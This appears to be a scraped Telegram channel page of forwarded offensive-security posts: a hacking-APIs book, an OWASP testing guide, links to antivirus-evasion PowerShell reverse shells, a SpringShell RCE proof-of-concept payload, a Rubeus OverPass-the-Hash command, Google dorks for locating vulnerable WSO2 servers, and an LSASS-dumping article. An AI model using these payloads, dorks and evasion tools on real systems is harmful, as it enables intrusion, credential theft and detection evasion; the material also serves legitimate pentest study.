Devious Methods
194 subscribers
153 photos
14 videos
65 files
535 links
Underground music / Cyberpunk stories
Download Telegram
Forwarded from S.E.Reborn
Hacking_APIs_Breaking_Web_Application_Programming_Interfaces_Early.pdf
39.4 MB
📖 Hacking APIs: Breaking Web Application Programming Interfaces.

• Дата выхода: 5 Марта 2022 год.
• Рейтинг: ⭐️⭐️⭐️⭐️⭐️ (5 out of 5)
• Цена в онлайн магазине: 36$ или 4464₽.

VT.

In the book’s nine guided labs, which target intentionally vulnerable APIs, you’ll practice:
Enumerating APIs users and endpoints using fuzzing techniques;
Using Postman to discover an excessive data exposure vulnerability;
Performing a JSON Web Token attack against an API authentication process;
Combining multiple API attack techniques to perform a NoSQL injection;
Attacking a GraphQL API to uncover a broken object level authorization vulnerability.

🧩 Софт для чтения.

#Hack #Web #Eng
Forwarded from white2hack 📚
OWASP_Руководство_по_тестированию_веб_безопасности_by_Кири_Э_.pdf
9.9 MB
OWASP. Руководство по тестированию веб-безопасности, автор Эйон Кири, 2020, перевод на русский осуществлен Condor (Александр)
Большое количество книг на разные темы от выживания до секретов резьбы по дереву
Forwarded from APT
PSSW100AVB

This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)

https://github.com/tihanyin/PSSW100AVB

#av #evasion #amsi #powershell #ps1
👍1
Forwarded from APT
SpringShell: Spring Core RCE
(CVE-2022-22963)

PoC Payload:
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")

Research:
https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html

Exploit:
https://github.com/craig/SpringCore0day

#spring #exploit #rce #cve
Forwarded from APT
OverPass-the-Hash in 1C Enterprise

To gain access to 1C Enterprise, you need a username and password. In case 1C works with LDAP authentication and you only have the user's NTLM hash, you can use Rubeus to launch 1C using the OverPass-the-Hash attack. Thus, you can access 1C Enterprise without having a password in the plaintext.

Invoke-Rubeus -Command "asktgt /user:i.ivanov /domain:APTNOTES.LOCAL /rc4:A87F3A337D73085C45F9416BE5787D86 /createnetonly:C:\1cestart.exe /show"

Bonus:
If the compromised user has permissions to run "External data processors", you can get a reverse shell of the 1C server.
https://github.com/KraudSecurity/1C-Exploit-Kit/tree/master/1C-Shell

#1c #pth #rubeus #ad
Media is too big
VIEW IN TELEGRAM
Трудовые будни redteam xD
Для тех кто ищет какой то особый «супер секретный путь в мир хакинга» посмотрите это видео.

Вкратце, нет никакого пути - изучай всё что тебе интересно & have fun! 😉

https://www.youtube.com/watch?v=2TofunAI6fU
👍21
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
WSO2 RCE (CVE-2022-29464)

Critical vulnerability on WSO2 discovered by Orange Tsai. the vulnerability is an unauthenticated unrestricted arbitrary file upload which which allows unauthenticated attackers to gain RCE on WSO2 servers via uploading malicious JSP files.

Google Dorks:
inurl:"/carbon/admin/login.jsp"
inurl:"/authenticationendpoint/login.do"
inurl:"devportal/apis"
intitle:"API Publisher- Login"
intitle:"WSO2 Management Console"

https://github.com/hakivvi/CVE-2022-29464

#wso2 #rce #exploit
Forwarded from Ralf Hacker Channel (Ralf Hacker)
@snovvcrash описал разные способы дампа LSASS

https://habr.com/ru/company/angarasecurity/blog/661341/

#art #pentest #redteam